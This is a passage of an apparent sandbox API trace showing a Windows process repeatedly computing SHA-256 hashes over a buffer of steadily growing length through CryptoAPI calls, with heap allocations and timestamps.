CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.284] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.284] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0119.284] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46340 [0119.284] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46340, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46340, pdwDataLen=0xceadc) returned 1 [0119.284] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.284] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.284] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.285] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.285] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0119.285] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.285] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e463a0 [0119.285] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e463a0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e463a0, pdwDataLen=0xceadc) returned 1 [0119.285] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.285] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.285] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.286] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.286] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0119.286] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.286] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46220 [0119.286] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46220, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46220, pdwDataLen=0xceadc) returned 1 [0119.286] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.286] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.286] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.286] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.287] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0119.287] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.287] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45e00 [0119.287] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45e00, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45e00, pdwDataLen=0xceadc) returned 1 [0119.287] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.287] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.287] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.287] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.287] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0119.287] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.287] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45fb0 [0119.287] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45fb0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45fb0, pdwDataLen=0xceadc) returned 1 [0119.287] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.287] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.287] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.288] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.288] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0119.288] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.288] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45ef0 [0119.288] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45ef0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45ef0, pdwDataLen=0xceadc) returned 1 [0119.288] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.288] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.288] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.289] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.289] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0119.289] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46250 [0119.289] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46250, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46250, pdwDataLen=0xceadc) returned 1 [0119.289] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.289] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.289] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.289] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.289] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0119.289] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46010 [0119.289] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46010, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46010, pdwDataLen=0xceadc) returned 1 [0119.289] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.289] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.290] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.290] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.290] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0119.290] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.290] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46040 [0119.290] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46040, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46040, pdwDataLen=0xceadc) returned 1 [0119.290] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.290] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.290] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.291] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.291] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0119.291] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.291] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46190 [0119.291] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46190, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46190, pdwDataLen=0xceadc) returned 1 [0119.291] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.291] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.291] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.291] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.291] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0119.292] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.292] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e460a0 [0119.292] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e460a0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e460a0, pdwDataLen=0xceadc) returned 1 [0119.292] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.292] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.292] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.292] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.292] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0119.292] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.292] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46100 [0119.292] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46100, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46100, pdwDataLen=0xceadc) returned 1 [0119.292] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.292] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.292] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.293] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.293] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0119.293] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.293] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46130 [0119.293] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46130, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46130, pdwDataLen=0xceadc) returned 1 [0119.293] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.293] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.293] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.294] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.294] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0119.294] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.294] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e462e0 [0119.294] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e462e0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e462e0, pdwDataLen=0xceadc) returned 1 [0119.294] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.294] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.294] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.294] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.294] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0119.294] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.294] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46160 [0119.295] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46160, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46160, pdwDataLen=0xceadc) returned 1 [0119.295] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.295] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.295] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.295] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.295] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0119.295] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.295] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46370 [0119.295] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46370, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46370, pdwDataLen=0xceadc) returned 1 [0119.295] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.295] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.295] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.296] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.296] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0119.296] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e463d0 [0119.296] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e463d0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e463d0, pdwDataLen=0xceadc) returned 1 [0119.296] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.296] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.296] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.297] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.297] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0119.297] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.297] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e461c0 [0119.297] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e461c0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e461c0, pdwDataLen=0xceadc) returned 1 [0119.297] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.297] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.297] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.297] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.297] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0119.297] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46460 [0119.298] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46460, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46460, pdwDataLen=0xceadc) returned 1 [0119.298] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.298] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.298] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.298] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.298] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0119.298] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46520 [0119.298] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46520, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46520, pdwDataLen=0xceadc) returned 1 [0119.298] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.298] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.298] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.299] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.299] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0119.299] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.299] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46880 [0119.299] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46880, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46880, pdwDataLen=0xceadc) returned 1 [0119.299] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.299] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.299] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.300] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.300] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0119.300] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46700 [0119.300] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46700, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46700, pdwDataLen=0xceadc) returned 1 [0119.300] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.300] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.300] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.300] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.300] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0119.300] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46910 [0119.300] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46910, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46910, pdwDataLen=0xceadc) returned 1 [0119.300] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.300] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.300] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.301] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.301] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0119.301] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.301] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46ac0 [0119.301] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46ac0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46ac0, pdwDataLen=0xceadc) returned 1 [0119.301] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.301] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.301] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.303] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.303] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0119.303] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.303] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46610 [0119.303] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46610, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46610, pdwDataLen=0xceadc) returned 1 [0119.303] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.303] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.303] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.304] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.304] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0119.304] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46790 [0119.304] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46790, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46790, 